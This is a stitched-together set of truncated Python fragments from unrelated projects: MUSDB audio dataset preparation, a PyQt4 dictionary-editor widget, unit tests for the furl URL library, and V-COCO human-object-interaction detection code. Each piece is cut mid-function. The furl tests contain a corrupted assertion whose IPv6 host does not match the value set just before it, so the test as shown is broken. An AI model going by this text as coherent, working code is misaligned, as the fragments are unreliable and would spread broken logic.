pickle_out = open(os.path.join(path_to_save_data, "train", "train_bass_12s.pickle"), "wb")
pickle.dump(train_bass_12s, pickle_out)
pickle_out.close()
pickle_out = open(os.path.join(path_to_save_data, "train", "train_other_12s.pickle"), "wb")
pickle.dump(train_other_12s, pickle_out)
pickle_out.close()
print("Train files n:", train_files_n)
print("Train files x:", train_files_x)
print("Train files s:", train_files_s)
print("Train files d:", train_files_d)
print("Val files n:", val_files_n)
print("Val files x:", val_files_x)
print("Val files s:", val_files_s)
print("Val files d:", val_files_d)
print("Train accompaniments 12s:", train_accompaniment_12s)
# -----------------------------------------------------------------------------------------------------------------
# process MUSDB test partition and make test files
test_files_n = []
test_files_s = | |
<gh_stars>0
# -*- coding: utf-8 -*-
#
# Copyright © 2009 <NAME>
# Licensed under the terms of the MIT License
# (see pydeelib/__init__.py for details)
"""
Dictionary Editor Widget and Dialog based on PyQt4
"""
#TODO: Multiple selection: open as many editors (array/dict/...) as necessary,
# at the same time
# pylint: disable-msg=C0103
# pylint: disable-msg=R0903
# pylint: disable-msg=R0911
# pylint: disable-msg=R0201
import re
from PyQt4.QtCore import (Qt, QVariant, QModelIndex, QAbstractTableModel,
SIGNAL, SLOT, QDateTime)
from PyQt4.QtGui import (QMessageBox, QTableView, QItemDelegate, QLineEdit,
QVBoxLayout, QWidget, QColor, QDialog, QDateEdit,
QDialogButtonBox, QMenu, QInputDialog, QDateTimeEdit,
QApplication, QKeySequence)
# Local import
from pydeelib.config import get_icon, get_font
from pydeelib.qthelpers import translate, add_actions, create_action
from pydeelib.widgets.texteditor import TextEditor
from pydeelib.widgets.importwizard import ImportWizard
#----Numpy arrays support
class FakeObject(object):
"""Fake class used in replacement of missing modules"""
pass
try:
from numpy import ndarray
from pydeelib.widgets.arrayeditor import ArrayEditor
except ImportError:
class ndarray(FakeObject):
"""Fake ndarray"""
pass
#----Misc.
def address(obj):
"""Return object address as a string: '<classname @ address>'"""
return "<%s @ %s>" % (obj.__class__.__name__,
hex(id(obj)).upper().replace('X','x'))
#----date and datetime objects support
import datetime
try:
from dateutil.parser import parse as dateparse
except ImportError:
from string import atoi
def dateparse(datestr):
"""Just for 'year, month, day' strings"""
return datetime.datetime( *map(atoi, datestr.split(',')) )
def datestr_to_datetime(value):
rp = value.rfind('(')+1
return dateparse(value[rp:-1])
#----Background colors for supported types
COLORS = {
bool: Qt.magenta,
(int, float, long): Qt.blue,
list: Qt.yellow,
dict: Qt.cyan,
tuple: Qt.lightGray,
(str, unicode): Qt.darkRed,
ndarray: Qt.green,
datetime.date: Qt.darkYellow,
}
def get_color(value, alpha=.2):
"""Return color depending on value type"""
color = QColor()
for typ in COLORS:
if isinstance(value, typ):
color = QColor(COLORS[typ])
color.setAlphaF(alpha)
return color
#----Sorting
def sort_against(lista, listb, reverse=False):
"""Arrange lista items in the same order as sorted(listb)"""
return [item for _, item in sorted(zip(listb, lista), reverse=reverse)]
def unsorted_unique(lista):
"""Removes duplicates from lista neglecting its initial ordering"""
set = {}
map(set.__setitem__,lista,[])
return set.keys()
#----Display <--> Value
def value_to_display(value, truncate=False,
trunc_len=80, minmax=False, collvalue=True):
"""Convert value for display purpose"""
if minmax and isinstance(value, ndarray):
if value.size == 0:
return repr(value)
try:
return 'Min: %r\nMax: %r' % (value.min(), value.max())
except TypeError:
pass
if not isinstance(value, (str, unicode)):
if isinstance(value, (list, tuple, dict, set)) and not collvalue:
value = address(value)
else:
value = repr(value)
if truncate and len(value) > trunc_len:
value = value[:trunc_len].rstrip() + ' ...'
return value
def try_to_eval(value):
"""Try to eval value"""
try:
return eval(value)
except (NameError, SyntaxError, ImportError):
return value
def display_to_value(value, default_value):
"""Convert back to value"""
value = unicode(value.toString())
try:
if isinstance(default_value, str):
value = str(value)
elif isinstance(default_value, (bool, list, dict, tuple)):
value = eval(value)
elif isinstance(default_value, float):
value = float(value)
elif isinstance(default_value, int):
value = int(value)
elif isinstance(default_value, datetime.datetime):
value = datestr_to_datetime(value)
elif isinstance(default_value, datetime.date):
value = datestr_to_datetime(value).date()
else:
value = try_to_eval(value)
except (ValueError, SyntaxError):
value = try_to_eval(value)
return value
def get_size(item):
"""Return size of an item of arbitrary type"""
if isinstance(item, (list, tuple, dict)):
return len(item)
elif isinstance(item, ndarray):
return item.shape
else:
return 1
def get_type(item):
"""Return type of an item"""
found = re.findall(r"<type '([\S]*)'>", str(type(item)))
text = unicode(translate('DictEditor', 'unknown')) \
if not found else found[0]
if isinstance(item, ndarray):
text = item.dtype.name
return text[text.find('.')+1:]
class ReadOnlyDictModel(QAbstractTableModel):
"""DictEditor Read-Only Table Model"""
def __init__(self, parent, data, title="", names=False,
truncate=True, minmax=False, collvalue=True, remote=False):
QAbstractTableModel.__init__(self, parent)
if data is None:
data = {}
self.names = names
self.truncate = truncate
self.minmax = minmax
self.collvalue = collvalue
self.remote = remote
self.header0 = None
self._data = None
self.showndata = None
self.keys = None
self.title = unicode(title) # in case title is not a string
if self.title:
self.title = self.title + ' - '
self.sizes = None
self.types = None
self.set_data(data)
def get_data(self):
"""Return model data"""
return self._data
def set_data(self, data, dictfilter=None):
"""Set model data"""
self._data = data
if dictfilter is not None and not self.remote:
data = dictfilter(data)
self.showndata = data
self.header0 = translate("DictEditor", "Index")
if self.names:
self.header0 = translate("DictEditor", "Name")
if isinstance(data, tuple):
self.keys = range(len(data))
self.title += translate("DictEditor", "Tuple")
elif isinstance(data, list):
self.keys = range(len(data))
self.title += translate("DictEditor", "List")
elif isinstance(data, dict):
self.keys = data.keys()
self.title += translate("DictEditor", "Dictionary")
if not self.names:
self.header0 = translate("DictEditor", "Key")
else:
raise RuntimeError("Invalid data type")
self.title += ' ('+str(len(self.keys))+' '+ \
translate("DictEditor", "elements")+')'
if self.remote:
self.sizes = [ data[self.keys[index]]['size']
for index in range(len(self.keys)) ]
self.types = [ data[self.keys[index]]['type']
for index in range(len(self.keys)) ]
else:
self.sizes = [ get_size(data[self.keys[index]])
for index in range(len(self.keys)) ]
self.types = [ get_type(data[self.keys[index]])
for index in range(len(self.keys)) ]
self.reset()
def sort(self, column, order=Qt.AscendingOrder):
"""Overriding sort method"""
reverse = (order==Qt.DescendingOrder)
if column == 0:
self.sizes = sort_against(self.sizes, self.keys, reverse)
self.types = sort_against(self.types, self.keys, reverse)
self.keys.sort(reverse=reverse)
elif column == 1:
self.keys = sort_against(self.keys, self.types, reverse)
self.sizes = sort_against(self.sizes, self.types, reverse)
self.types.sort(reverse=reverse)
elif column == 2:
self.keys = sort_against(self.keys, self.sizes, reverse)
self.types = sort_against(self.types, self.sizes, reverse)
self.sizes.sort(reverse=reverse)
elif column == 3:
self.keys = sort_against(self.keys, self.sizes, reverse)
self.types = sort_against(self.types, self.sizes, reverse)
self.sizes.sort(reverse=reverse)
elif column == 4:
values = [self._data[key] for key in self.keys]
self.keys = sort_against(self.keys, values, reverse)
self.sizes = sort_against(self.sizes, values, reverse)
self.types = sort_against(self.types, values, reverse)
self.reset()
def columnCount(self, qindex=QModelIndex()):
"""Array column number"""
return 4
def rowCount(self, qindex=QModelIndex()):
"""Array row number"""
return len(self.keys)
def get_key(self, index):
"""Return current key"""
return self.keys[index.row()]
def get_value(self, index):
"""Return current value"""
if index.column() == 0:
return self.keys[ index.row() ]
elif index.column() == 1:
return self.types[ index.row() ]
elif index.column() == 2:
return self.sizes[ index.row() ]
else:
return self._data[ self.keys[index.row()] ]
def get_bgcolor(self, index):
"""Background color depending on value"""
if index.column() == 0:
color = QColor(Qt.lightGray)
color.setAlphaF(.05)
elif index.column() < 3:
color = QColor(Qt.lightGray)
color.setAlphaF(.2)
else:
color = QColor(Qt.lightGray)
color.setAlphaF(.3)
return color
def data(self, index, role=Qt.DisplayRole):
"""Cell content"""
if not index.isValid():
return QVariant()
value = self.get_value(index)
if index.column() == 3 and self.remote:
value = value['view']
display = value_to_display(value,
truncate=index.column() == 3 and self.truncate,
minmax=self.minmax,
collvalue=self.collvalue or index.column() != 3)
if role == Qt.DisplayRole:
return QVariant(display)
elif role == Qt.EditRole:
return QVariant(value_to_display(value))
elif role == Qt.TextAlignmentRole:
if index.column() == 3:
if len(display.splitlines()) < 3:
return QVariant(int(Qt.AlignLeft|Qt.AlignVCenter))
else:
return QVariant(int(Qt.AlignLeft|Qt.AlignTop))
else:
return QVariant(int(Qt.AlignLeft|Qt.AlignVCenter))
elif role == Qt.BackgroundColorRole:
return QVariant( self.get_bgcolor(index) )
elif role == Qt.FontRole:
if index.column() < 3:
return QVariant(get_font('dicteditor_header'))
else:
return QVariant(get_font('dicteditor'))
return QVariant()
def headerData(self, section, orientation, role=Qt.DisplayRole):
"""Overriding method headerData"""
if role != Qt.DisplayRole:
if role == Qt.FontRole:
return QVariant(get_font('dicteditor_header'))
else:
return QVariant()
i_column = int(section)
if orientation == Qt.Horizontal:
headers = (self.header0,
translate("DictEditor", "Type"),
translate("DictEditor", "Size"),
translate("DictEditor", "Value"))
return QVariant( headers[i_column] )
else:
return QVariant()
def flags(self, index):
"""Overriding method flags"""
# This method was implemented in DictModel only, but to enable tuple
# exploration (even without editing), this method was moved here
if not index.isValid():
return Qt.ItemIsEnabled
return Qt.ItemFlags(QAbstractTableModel.flags(self, index)|
Qt.ItemIsEditable)
class DictModel(ReadOnlyDictModel):
"""DictEditor Table Model"""
def set_value(self, index, value):
"""Set value"""
self._data[ self.keys[index.row()] ] = value
self.showndata[ self.keys[index.row()] ] = value
self.sizes[index.row()] = get_size(value)
self.types[index.row()] = get_type(value)
def get_bgcolor(self, index):
"""Background color depending on value"""
value = self.get_value(index)
if index.column()<3:
color = ReadOnlyDictModel.get_bgcolor(self, index)
else:
if self.remote:
color = value['color']
else:
color = get_color(value)
return color
def setData(self, index, value, role=Qt.EditRole):
"""Cell content change"""
if not index.isValid():
return False
if index.column()<3:
return False
value = display_to_value( value, self.get_value(index) )
self.set_value(index, value)
self.emit(SIGNAL("dataChanged(QModelIndex,QModelIndex)"),
index, index)
return True
class DictDelegate(QItemDelegate):
"""DictEditor Item Delegate"""
def __init__(self, parent=None, inplace=False):
QItemDelegate.__init__(self, parent)
self.inplace = inplace
def get_value(self, index):
return index.model().get_value(index)
def set_value(self, index, value):
index.model().set_value(index, value)
def createEditor(self, parent, option, index):
"""Overriding method createEditor"""
if index.column()<3:
return None
value = self.get_value(index)
key = index.model().get_key(index)
readonly = isinstance(value, tuple) or self.parent().readonly
#---editor = DictEditor
if isinstance(value, (list, tuple, dict)) and not self.inplace:
editor = DictEditor(value, key, icon=self.parent().windowIcon(),
readonly=readonly)
if editor.exec_() and not readonly:
self.set_value(index, editor.get_copy())
return None
#---editor = ArrayEditor
elif isinstance(value, ndarray) and ndarray is not FakeObject \
and not self.inplace:
if value.size == 0:
return None
editor = ArrayEditor(value, title=key, readonly=readonly)
if editor.exec_():
# Only necessary for child class RemoteDictDelegate:
# (ArrayEditor does not make a copy of value)
self.set_value(index, value)
return None
#---editor = QDateTimeEdit
elif isinstance(value, datetime.datetime) and not self.inplace:
editor = QDateTimeEdit(value, parent)
editor.setCalendarPopup(True)
editor.setFont(get_font('dicteditor'))
self.connect(editor, SIGNAL("returnPressed()"),
self.commitAndCloseEditor)
return editor
#---editor = QDateEdit
elif isinstance(value, datetime.date) and not self.inplace:
editor = QDateEdit(value, parent)
editor.setCalendarPopup(True)
editor.setFont(get_font('dicteditor'))
self.connect(editor, SIGNAL("returnPressed()"),
self.commitAndCloseEditor)
return | |
== furl.furl(f).url == furl.furl(f.url).url
assert f is not f.copy() and f.url == f.copy().url
# URL paths are optionally absolute if scheme and netloc are
# empty.
f = furl.furl()
f.path.segments = ['pumps']
assert str(f.path) == 'pumps'
f.path = 'pumps'
assert str(f.path) == 'pumps'
# Fragment paths are optionally absolute, and not absolute by
# default.
f = furl.furl()
f.fragment.path.segments = ['pumps']
assert str(f.fragment.path) == 'pumps'
f.fragment.path = 'pumps'
assert str(f.fragment.path) == 'pumps'
# URLs comprised of a netloc string only should not be prefixed
# with '//', as-is the default behavior of
# urlparse.urlunsplit().
f = furl.furl()
assert f.set(host='foo').url == 'foo'
assert f.set(host='pumps.com').url == 'pumps.com'
assert f.set(host='pumps.com', port=88).url == 'pumps.com:88'
assert f.set(netloc='pumps.com:88').url == 'pumps.com:88'
def test_basic_manipulation(self):
f = furl.furl('http://www.pumps.com/')
f.args.setdefault('foo', 'blah')
assert str(f) == 'http://www.pumps.com/?foo=blah'
f.query.params['foo'] = 'eep'
assert str(f) == 'http://www.pumps.com/?foo=eep'
f.port = 99
assert str(f) == 'http://www.pumps.com:99/?foo=eep'
f.netloc = 'www.yahoo.com:220'
assert str(f) == 'http://www.yahoo.com:220/?foo=eep'
f.netloc = 'www.yahoo.com'
assert f.port == 80
assert str(f) == 'http://www.yahoo.com/?foo=eep'
f.scheme = 'sup'
assert str(f) == 'sup://www.yahoo.com:80/?foo=eep'
f.port = None
assert str(f) == 'sup://www.yahoo.com/?foo=eep'
f.fragment = 'sup'
assert str(f) == 'sup://www.yahoo.com/?foo=eep#sup'
f.path = 'hay supppp'
assert str(f) == 'sup://www.yahoo.com/hay%20supppp?foo=eep#sup'
f.args['space'] = '1 2'
assert str(
f) == 'sup://www.yahoo.com/hay%20supppp?foo=eep&space=1+2#sup'
del f.args['foo']
assert str(f) == 'sup://www.yahoo.com/hay%20supppp?space=1+2#sup'
f.host = 'ohay.com'
assert str(f) == 'sup://ohay.com/hay%20supppp?space=1+2#sup'
def test_odd_urls(self):
# Empty.
f = furl.furl('')
assert f.username is f.password is None
assert f.scheme is f.host is f.port is f.netloc is None
assert str(f.path) == ''
assert str(f.query) == ''
assert f.args == f.query.params == {}
assert str(f.fragment) == ''
assert f.url == ''
# Keep in mind that ';' is a query delimeter for both the URL
# query and the fragment query, resulting in the str(path),
# str(query), and str(fragment) values below.
url = (
"sup://example.com/:@-._~!$&'()*+,=;:@-._~!$&'()*+,=:@-._~!$&'()*+"
",==?/?:@-._~!$'()*+,;=/?:@-._~!$'()*+,;==#/?:@-._~!$&'()*+,;=")
pathstr = "/:@-._~!$&'()*+,=;:@-._~!$&'()*+,=:@-._~!$&'()*+,=="
querystr = "/?:@-._~!$'()*+,=&=/?:@-._~!$'()*+,&=="
fragmentstr = "/?:@-._~!$=&'()*+,=&="
f = furl.furl(url)
assert f.scheme == 'sup'
assert f.host == 'example.com'
assert f.port is None
assert f.netloc == 'example.com'
assert str(f.path) == pathstr
assert str(f.query) == querystr
assert str(f.fragment) == fragmentstr
# Scheme only.
f = furl.furl('sup://')
assert f.scheme == 'sup'
assert f.host is f.port is f.netloc is None
assert str(f.path) == ''
assert str(f.query) == ''
assert f.args == f.query.params == {}
assert str(f.fragment) == ''
assert f.url == 'sup://' and f.netloc is None
f.scheme = None
assert f.scheme is None and f.netloc is None and f.url == ''
f.scheme = ''
assert f.scheme == '' and f.netloc is None and f.url == '//'
# Host only.
f = furl.furl().set(host='pumps.meat')
assert f.url == 'pumps.meat' and f.netloc == f.host == 'pumps.meat'
f.host = None
assert f.url == '' and f.host is f.netloc is None
f.host = ''
assert f.url == '' and f.host == f.netloc == ''
# Port only.
f = furl.furl()
f.port = 99
assert f.url == ':99' and f.netloc is not None
f.port = None
assert f.url == '' and f.netloc is None
# urlparse.urlsplit() treats the first two '//' as the beginning
# of a netloc, even if the netloc is empty.
f = furl.furl('////path')
assert f.url == '//path' and str(f.path) == '//path'
# TODO(grun): Test more odd urls.
def test_hosts(self):
# No host.
url = 'http:///index.html'
f = furl.furl(url)
assert f.host is None and furl.furl(url).url == url
# Valid IPv4 and IPv6 addresses.
f = furl.furl('http://192.168.1.101')
f = furl.furl('http://[2001:db8:85a3:8d3:1319:8a2e:370:7348]/')
# Invalid IPv4 addresses shouldn't raise an exception because
# urlparse.urlsplit() doesn't raise an exception on invalid IPv4
# addresses.
f = furl.furl('http://1.2.3.4.5.6/')
# Invalid, but well-formed, IPv6 addresses shouldn't raise an
# exception because urlparse.urlsplit() doesn't raise an
# exception on invalid IPv6 addresses.
furl.furl('http://[0:0:0:0:0:0:0:1:1:1:1:1:1:1:1:9999999999999]/')
# Malformed IPv6 should raise an exception because
# urlparse.urlsplit() raises an exception in Python v2.7+. In
# Python <= 2.6, urlsplit() doesn't raise a ValueError on
# malformed IPv6 addresses.
if PYTHON_27PLUS:
with self.assertRaises(ValueError):
furl.furl('http://[0:0:0:0:0:0:0:1/')
with self.assertRaises(ValueError):
furl.furl('http://0:0:0:0:0:0:0:1]/')
def test_netlocs(self):
f = furl.furl('http://pumps.com/')
netloc = '1.2.3.4.5.6:999'
f.netloc = netloc
assert f.netloc == netloc
assert f.host == '1.2.3.4.5.6'
assert f.port == 999
netloc = '[0:0:0:0:0:0:0:1:1:1:1:1:1:1:1:9999999999999]:888'
f.netloc = netloc
assert f.netloc == netloc
assert f.host == '[0:0:0:0:0:0:0:1:1:1:1:1:1:1:1:9999999999999]'
assert f.port == 888
# Malformed IPv6 should raise an exception because
# urlparse.urlsplit() raises an exception in Python v2.7+.
if PYTHON_27PLUS:
with self.assertRaises(ValueError):
f.netloc = '[0:0:0:0:0:0:0:1'
with self.assertRaises(ValueError):
f.netloc = '0:0:0:0:0:0:0:1]'
# Invalid ports.
with self.assertRaises(ValueError):
f.netloc = '[0:0:0:0:0:0:0:1]:alksdflasdfasdf'
with self.assertRaises(ValueError):
f.netloc = 'pump2pump.org:777777777777'
# No side effects.
assert f.host == '[0:fc00:db20:35b:7399::5:1:1:1:1:1:1:9999999999999]'
assert f.port == 888
def test_ports(self):
# Default port values.
assert furl.furl('http://www.pumps.com/').port == 80
assert furl.furl('https://www.pumps.com/').port == 443
assert furl.furl('undefined://www.pumps.com/').port is None
# Override default port values.
assert furl.furl('http://www.pumps.com:9000/').port == 9000
assert furl.furl('https://www.pumps.com:9000/').port == 9000
assert furl.furl('undefined://www.pumps.com:9000/').port == 9000
# Reset the port.
f = furl.furl('http://www.pumps.com:9000/')
f.port = None
assert f.url == 'http://www.pumps.com/'
assert f.port == 80
f = furl.furl('undefined://www.pumps.com:9000/')
f.port = None
assert f.url == 'undefined://www.pumps.com/'
assert f.port is None
# Invalid port raises ValueError with no side effects.
with self.assertRaises(ValueError):
furl.furl('http://www.pumps.com:invalid/')
url = 'http://www.pumps.com:400/'
f = furl.furl(url)
assert f.port == 400
with self.assertRaises(ValueError):
f.port = 'asdf'
assert f.url == url
f.port = 9999
with self.assertRaises(ValueError):
f.port = []
with self.assertRaises(ValueError):
f.port = -1
with self.assertRaises(ValueError):
f.port = 77777777777
assert f.port == 9999
assert f.url == 'http://www.pumps.com:9999/'
self.assertRaises(f.set, port='asdf')
def test_add(self):
f = furl.furl('http://pumps.com/')
assert f is f.add(args={'a': 'a', 'm': 'm&m'}, path='kwl jump',
fragment_path='1', fragment_args={'f': 'frp'})
assert self._param(f.url, 'a', 'a')
assert self._param(f.url, 'm', 'm&m')
assert str(f.fragment) == '1?f=frp'
assert str(f.path) == urlparse.urlsplit(f.url).path == '/kwl%20jump'
assert f is f.add(path='dir', fragment_path='23', args={'b': 'b'},
fragment_args={'b': 'bewp'})
assert self._param(f.url, 'a', 'a')
assert self._param(f.url, 'm', 'm&m')
assert self._param(f.url, 'b', 'b')
assert str(f.path) == '/kwl%20jump/dir'
assert str(f.fragment) == '1/23?f=frp&b=bewp'
# Supplying both <args> and <query_params> should raise a
# warning.
with warnings.catch_warnings(True) as w1:
f.add(args={'a': '1'}, query_params={'a': '2'})
assert len(w1) == 1 and issubclass(w1[0].category, UserWarning)
assert self._param(
f.url, 'a', '1') and self._param(f.url, 'a', '2')
params = f.args.allitems()
assert params.index(('a', '1')) < params.index(('a', '2'))
def test_set(self):
f = furl.furl('http://pumps.com/kwl%20jump/dir')
assert f is f.set(args={'no': 'nope'}, fragment='sup')
assert 'a' not in f.args
assert 'b' not in f.args
assert f.url == 'http://pumps.com/kwl%20jump/dir?no=nope#sup'
# No conflict warnings between <host>/<port> and <netloc>, or
# <query> and <params>.
assert f is f.set(args={'a': 'a a'}, path='path path/dir', port='999',
fragment='moresup', scheme='sup', host='host')
assert str(f.path) == '/path%20path/dir'
assert f.url == 'sup://host:999/path%20path/dir?a=a+a#moresup'
# Path as a list of path segments to join.
assert f is f.set(path=['d1', 'd2'])
assert f.url == 'sup://host:999/d1/d2?a=a+a#moresup'
assert f is f.add(path=['/d3/', '/d4/'])
assert f.url == 'sup://host:999/d1/d2/%2Fd3%2F/%2Fd4%2F?a=a+a#moresup'
# Set a lot of stuff (but avoid conflicts, which are tested
# below).
f.set(
query_params={'k': 'k'}, fragment_path='no scrubs', scheme='morp',
host='myhouse', port=69, path='j$j*m#n', fragment_args={'f': 'f'})
assert f.url == 'morp://myhouse:69/j$j*m%23n?k=k#no%20scrubs?f=f'
# No side effects.
oldurl = f.url
with self.assertRaises(ValueError):
f.set(args={'a': 'a a'}, path='path path/dir', port='INVALID_PORT',
fragment='moresup', scheme='sup', host='host')
assert f.url == oldurl
with warnings.catch_warnings(True) as w1:
self.assertRaises(
ValueError, f.set, netloc='nope.com:99', port='NOPE')
assert len(w1) == 1 and issubclass(w1[0].category, UserWarning)
assert f.url == oldurl
# Separator isn't reset with set().
f = furl.Fragment()
f.separator = False
f.set(path='flush', args={'dad': 'nope'})
assert str(f) == 'flushdad=nope'
# Test warnings for potentially overlapping parameters.
f = furl.furl('http://pumps.com')
warnings.simplefilter("always")
# Host, port, and netloc overlap - host and port take
# precedence.
with warnings.catch_warnings(True) as w1:
f.set(netloc='dumps.com:99', host='ohay.com')
assert len(w1) == 1 and issubclass(w1[0].category, UserWarning)
f.host == 'ohay.com'
f.port == 99
with warnings.catch_warnings(True) as w2:
f.set(netloc='dumps.com:99', port=88)
assert len(w2) == 1 and issubclass(w2[0].category, UserWarning)
f.port == 88
with warnings.catch_warnings(True) as w3:
f.set(netloc='dumps.com:99', host='ohay.com', port=88)
assert len(w3) == 1 and issubclass(w3[0].category, UserWarning)
# Query, args, and query_params overlap - args and query_params
# take precedence.
with warnings.catch_warnings(True) as w4:
f.set(query='yosup', args={'a': 'a', 'b': 'b'})
assert len(w4) == 1 and issubclass(w4[0].category, UserWarning)
assert self._param(f.url, 'a', 'a')
assert self._param(f.url, 'b', 'b')
with warnings.catch_warnings(True) as w5:
f.set(query='yosup', query_params={'a': 'a', 'b': 'b'})
assert len(w5) == 1 and issubclass(w5[0].category, UserWarning)
assert self._param(f.url, 'a', 'a')
assert self._param(f.url, 'b', 'b')
with warnings.catch_warnings(True) as w6:
f.set(args={'a': 'a', 'b': 'b'}, query_params={'c': 'c', 'd': 'd'})
assert len(w6) == 1 | |
projected RoI
"""
rois = im_rois.astype(np.float, copy=False) * scales
levels = np.zeros((im_rois.shape[0], 1), dtype=np.int)
return rois, levels
def _add_multilevel_rois_for_test(blobs, name):
"""Distributes a set of RoIs across FPN pyramid levels by creating new level
specific RoI blobs.
Arguments:
blobs (dict): dictionary of blobs
name (str): a key in 'blobs' identifying the source RoI blob
Returns:
[by ref] blobs (dict): new keys named by `name + 'fpn' + level`
are added to dict each with a value that's an R_level x 5 ndarray of
RoIs (see _get_rois_blob for format)
"""
lvl_min = cfg.FPN.ROI_MIN_LEVEL
lvl_max = cfg.FPN.ROI_MAX_LEVEL
lvls = fpn_utils.map_rois_to_fpn_levels(blobs[name][:, 1:5], lvl_min, lvl_max)
fpn_utils.add_multilevel_roi_blobs(
blobs, name, blobs[name], lvls, lvl_min, lvl_max
)
def _get_blobs(im, rois, target_scale, target_max_size):
"""Convert an image and RoIs within that image into network inputs."""
blobs = {}
blobs['data'], im_scale, blobs['im_info'] = \
blob_utils.get_image_blob(im, target_scale, target_max_size)
if rois is not None:
blobs['rois'] = _get_rois_blob(rois, im_scale)
return blobs, im_scale
# -------------------------- HOI ----------------------------
def im_detect_hoi(model, boxes, scores, human_count, im_info, blob_conv, entry=None, vcoco_heatmaps=None):
hoi_blob_in = get_hoi_blob_names(is_training=False)
# im_info.shape = (1, 3) h, w, scale
im_scale = im_info[0, 2]
# project boxes to re-sized image size
hoi_blob_in['boxes'] = np.hstack((np.zeros((boxes.shape[0], 1), dtype=boxes.dtype),
boxes * im_scale))
hoi_blob_in['scores'] = scores
human_index = np.arange(boxes.shape[0])[:human_count]
object_index = np.arange(boxes.shape[0])[human_count:]
interaction_human_inds, interaction_target_object_inds \
= np.repeat(human_index, object_index.size), np.tile(object_index - human_count, human_index.size)
hoi_blob_in['human_index'] = human_index
hoi_blob_in['target_object_index'] = object_index
hoi_blob_in['interaction_human_inds'] = interaction_human_inds
hoi_blob_in['interaction_target_object_inds'] = interaction_target_object_inds
# Add multi-level rois for FPN
if cfg.FPN.MULTILEVEL_ROIS:
_add_multilevel_rois_for_test(hoi_blob_in, 'boxes')
# if no human box is detected, not use hoi_head, just return nan
if human_index.size > 0:
hoi_blob_out = model.module.hoi_net(blob_conv, hoi_blob_in, im_info, vcoco_heatmaps)
# ipdb.set_trace()
# if entry:
# test_hoi_fill_hoi_blob_from_gt(hoi_blob_out, entry, im_scale)
hoi_res = hoi_res_gather(hoi_blob_out, im_scale, entry)
else:
# ToDo: any problem here?
hoi_res = dict(
agents=np.full((1, 4 + cfg.VCOCO.NUM_ACTION_CLASSES), np.nan),
roles=np.full((1, 5 * cfg.VCOCO.NUM_ACTION_CLASSES, cfg.VCOCO.NUM_TARGET_OBJECT_TYPES), np.nan),
)
return hoi_res
def hoi_res_gather(hoi_blob, im_scale, entry=None):
'''
Convert predicted score and location to triplets
:param hoi_blob:
:param im_scale:
:param entry:
:return:
'''
# ToDo: modify comments
num_action_classes = cfg.VCOCO.NUM_ACTION_CLASSES
num_target_object_types = cfg.VCOCO.NUM_TARGET_OBJECT_TYPES
human_action_score = F.sigmoid(hoi_blob['human_action_score']).cpu().numpy()
human_action_bbox_pred = hoi_blob['human_action_bbox_pred'].cpu().numpy()
interaction_action_score = F.sigmoid(hoi_blob['interaction_action_score']).cpu().numpy()
human_score = hoi_blob['scores'][hoi_blob['human_index']]
object_score = hoi_blob['scores'][hoi_blob['target_object_index']]
# scale to original image size when testing
boxes = hoi_blob['boxes'][:, 1:] / im_scale
# For actions don't interact with object, action_score is s_h * s^a_h
# For triplets(interact with objects), action_score is s_h * s_o * s^a_h * g^a_h,o
# we use mask to choose appropriate score
action_mask = np.array(cfg.VCOCO.ACTION_MASK)
triplet_action_mask = np.tile(action_mask.transpose((1, 0)), (human_action_score.shape[0], 1, 1))
# For actions that that do not interact with any object (e.g., smile, run),
# we rely on s^a_h and the interaction output s^a_h_o is not used,
human_action_pair_score = human_score[:, np.newaxis] * human_action_score
# in case there is no role-objects
if hoi_blob['target_object_index'].size > 0:
# transform from (human num, object num, action_num) to
# (human_num*action_num*num_target_object_types, object_num)
interaction_action_score = \
interaction_action_score.reshape(human_score.size, object_score.size, -1).transpose(0, 2, 1)
interaction_action_score = np.repeat(interaction_action_score, num_target_object_types, axis=1
).reshape(-1, object_score.size)
# get target localization term g^a_h,o
target_localization_term = target_localization(boxes, hoi_blob['human_index'],
hoi_blob['target_object_index'], human_action_bbox_pred)
# find the object box that maximizes S^a_h,o
# `for each human / action pair we find the object box that maximizes S_h_o^a`
object_action_score = object_score * interaction_action_score * target_localization_term
choosed_object_inds = np.argmax(object_action_score, axis=-1)
# choose corresponding target_localization_term
target_localization_term = target_localization_term[np.arange(choosed_object_inds.size), choosed_object_inds]
# ToDo: choose top-50
# triplet score S^a_h,o
triplet_action_score = \
np.repeat(human_score, num_action_classes * num_target_object_types) * \
object_score[choosed_object_inds] * \
np.repeat(human_action_score, num_target_object_types, axis=1).ravel() * \
target_localization_term
# transform to (human_num, action_num, num_target_object_types)
triplet_action_score = triplet_action_score.reshape(human_action_score.shape[0], num_action_classes,
num_target_object_types)
# ToDo: thresh
# triplet_action_score[triplet_action_mask <= cfg.TEST.SCORE_THRESH] = np.nan
if entry:
# assert triplet_action_score.shape == entry['gt_role_id'][hoi_blob['human_index']].shape
for i in range(len(triplet_action_score.shape)):
pass
# assert np.all(np.where(triplet_action_score > 0.9)[i] ==
# np.where(entry['gt_role_id'][hoi_blob['human_index']] > -1)[i])
# choose appropriate score
# ToDo: any problem here?
# As not every action that defined interacts with objects will have
# corresponding objects in one image, and triplet_action_score always
# have a object box, should I set a thresh or some method to choose
# score between human_action_pair_score and triplet score???
# OR wrong result will be excluded when calculate AP??
# action_score = np.zeros(human_action_score.shape)
# action_score[human_action_mask == 0] = human_action_pair_score[human_action_mask == 0]
# action_score[human_action_mask == 1] = np.amax(triplet_action_score, axis=-1)[human_action_mask == 1]
# set triplet action score don't interact with object to zero
# triplet_action_score[triplet_action_mask == 0] = np.nan
triplet_action_score[triplet_action_mask == 0] = -1
top_k_value = triplet_action_score.flatten()[
np.argpartition(triplet_action_score, -cfg.VCOCO.KEEP_TOP_NUM, axis=None)[-cfg.VCOCO.KEEP_TOP_NUM]]
triplet_action_score[triplet_action_score <= top_k_value] = np.nan
# get corresponding box of role-objects
choosed_object_inds = choosed_object_inds.reshape(human_action_score.shape[0], num_action_classes,
num_target_object_types)
choosed_objects = boxes[hoi_blob['target_object_index']][choosed_object_inds]
else:
# if there is no object predicted, triplet action score won't used
triplet_action_score = np.full((1, num_action_classes, num_target_object_types), np.nan)
choosed_objects = np.zeros((1, num_action_classes, num_target_object_types, 4))
action_score = human_action_pair_score
# ToDo: threshold
# action_score[action_score <= cfg.TEST.SCORE_THRESH] = np.nan
# keep consistent with v-coco eval code
# agents: box coordinates + 26 action score.
# roles: 26 * (role object coordinates + role-action score) * num_target_object_types
agents = np.hstack((boxes[hoi_blob['human_index']], action_score))
roles = np.concatenate((choosed_objects, triplet_action_score[..., np.newaxis]), axis=-1)
